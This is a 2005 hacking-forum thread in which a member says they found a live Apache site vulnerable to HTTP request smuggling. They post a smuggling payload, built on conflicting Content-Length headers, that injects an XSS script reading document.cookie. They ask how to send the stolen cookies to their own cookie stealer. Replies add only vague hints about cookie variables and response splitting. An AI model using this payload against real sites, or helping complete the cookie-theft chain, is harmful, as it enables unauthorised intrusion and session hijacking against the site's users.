Http request smuggling

Discussion in 'Forum for discussion of ANTICHAT' started by caffine2, 10 Oct 2005.

  1. caffine2

    caffine2 New Member

    Joined:
    11 Aug 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Hi,
    I found a site vulnerable to http request smuggling it runs an apache server. I have been looking up information on this all day yet the stuff that i find doesent explain it verry well! i know that it has to be sent to the site through packets but what i dont understand is how could i use
    Code:
    Code:
    1 POST /some_script.jsp HTTP/1.0
    2 Connection: Keep-Alive
    3 Content-Type: application/x-www-form-urlencoded
    4 Content-Length: 9
    5 Content-Length: 204
    6
    7 this=thatPOST /vuln_page.jsp HTTP/1.0
    8 Content-Type: application/x-www-form-urlencoded
    9 Content-Length: 95
    10
    11 param1=value1&data=<script>alert("stealing%20your%20data:"%
    2bdocument.cookie)</script>&foobar=
    
    Now i know that does xss but how would i get that to redirect to my cookie stealer. also would that be what im looking for if i want to exploit the server ? well thank you for spending the time to read this (and i did check google for the information, but it didnt sufice)
    sincerly
    Crimson-Jolt

    ps im using inet crack for spoofing

    [/code]
     
  2. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    $date put in cookie?
     
  3. caffine2

    caffine2 New Member

    Joined:
    11 Aug 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    I dont understand either of your post's can you elaborate more........
    thanks
     
  4. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Sorry my English is bad))
    So if $data take in cookie,then http request smuggling maybe done
    You can translate this Russian sentensis:
    Если переменная $data берется из cookies,то http request smuggling может получится.
     
  5. PEPSICOLA

    PEPSICOLA . . . . . 2L . . . . .

    Joined:
    14 Oct 2004
    Messages:
    1,025
    Likes Received:
    819
    Reputations:
    368
    if variable $data you take from cookie, then.... =)
     
  6. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,097
    Likes Received:
    672
    Reputations:
    591
    as i know this bug is very stupid=) i found one day this bug in one script, and i couldn`t do something except giving me cookie by server named as i wanted=) there in docs were something that we could set header location or something like that..
     
  7. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    this bug is called HTTP Response splitting...
     
Loading...
Similar Threads - Http request smuggling
  1. Fugitif
    Replies:
    0
    Views:
    4,695